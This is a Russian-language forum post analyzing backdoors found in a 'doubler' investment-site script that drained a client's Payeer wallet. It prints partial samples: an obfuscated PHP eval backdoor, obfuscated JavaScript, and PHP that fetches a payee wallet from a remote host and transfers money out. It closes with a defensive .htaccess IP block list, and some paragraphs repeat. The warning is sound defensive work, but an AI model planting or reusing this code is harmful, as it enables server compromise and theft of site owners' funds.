Darek
Участник
Всем привет.
Хочу немного рассказать про информацию которою выявил, нашёл и узнал.
Совсем недавно ко мне обратился клиент с просьбой о помощи.
Используя один скрипт удвоителя, он запустил проект и у него стали списывать деньги со счёта, сначала рандомными суммами,
а потом и вовсе все что было на кошельке. Даже не смотря на то что он перекидывал на другой домен и менял данные.
Немного поковырявшись в скрипте я нашёл более 10 различных вредоносных кода и решил их предоставить вам, НО частично.
Что я имею в виду говоря частично? То что я не буду выкладывать весь код, дабы в дальнем его не использовали.
И так приступим.
кошелёк на который уходят средства - P1032584793
Что бы частично защитить себя, проверяем содержимое всех файлов на совпадение.
в файле .htaccess прописываем
Хочу немного рассказать про информацию которою выявил, нашёл и узнал.
Совсем недавно ко мне обратился клиент с просьбой о помощи.
Используя один скрипт удвоителя, он запустил проект и у него стали списывать деньги со счёта, сначала рандомными суммами,
а потом и вовсе все что было на кошельке. Даже не смотря на то что он перекидывал на другой домен и менял данные.
Немного поковырявшись в скрипте я нашёл более 10 различных вредоносных кода и решил их предоставить вам, НО частично.
Что я имею в виду говоря частично? То что я не буду выкладывать весь код, дабы в дальнем его не использовали.
И так приступим.
PHP:
if ($_GET['dep'] == "ev") {
$FQnI='Sy1LzNFQGAA==';
$rxpa=';)))VaWS$(rqbprq_46rfno(ravmt(ynir';
$DKV=strrev($ropa);$tWSiA=str_rot13($DlV);
eval($tiA);
}
Как используется?
https:/ / адрес сайта . ком / путь до файла в котором расположен код.php / ?dep=ev
вызывает форму загрузки файлов весом до 1 Гига
PHP:
[S][I]<script>[/I][/S]
[I][S] function s_(s,c){return s.charAt(c)};function D_(){var temp="",i,c=0,out="";var str="60!105!112!108!111!103!103!101!114!46!111!114!34!32!32!98!111!114!100!101!114!61!34!48!34!62!";l=str.length;while(c<=str.length-1){while(s_(str,c)!='!')temp=temp+s_(str,c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
</script><script>
D_();[/S][/I]
[S][I] </script>[/I][/S]кошелёк на который уходят средства - P1032584793
PHP:
[I][S] require_once('boost_core/classes/cpayeer.php');[/S][/I]
[S][I] $homepage = file_get_contents("https://sqltor.had.su/js/p.txt");
$array = array(94, 210, 158, 342, 146);
$payeer = new CPayeer($accountNumber, $apiId, $apiKey);
if ($payeer->isAuth())
{
$arTransfer = $payeer->transfer(array(
'curIn' => 'RUB',
'sum' => $array[array_rand($array)],
'curOut' => 'RUB',
'to' => $homepage,
'comment' => ''.$_SERVER["HTTP_HOST"].'',
));
if (empty($arTransfer['errors']))
{
//echo getErrors
}
else
{
//echo getErrors
}
}
else
{
//echo getErrors[/I][/S]
[I][S] }[/S][/I]Что бы частично защитить себя, проверяем содержимое всех файлов на совпадение.
в файле .htaccess прописываем
#Создаем черный список IP адресов
allow from all
deny from 77.111.247.186
deny from 77.111.245.20
deny from 77.111.247.48
deny from 77.111.0.0/16
deny from 95.73.203.172
deny from 82.208.124.96
deny from 45.147.197.180
allow from all
deny from 77.111.247.186
deny from 77.111.245.20
deny from 77.111.247.48
deny from 77.111.0.0/16
deny from 95.73.203.172
deny from 82.208.124.96
deny from 45.147.197.180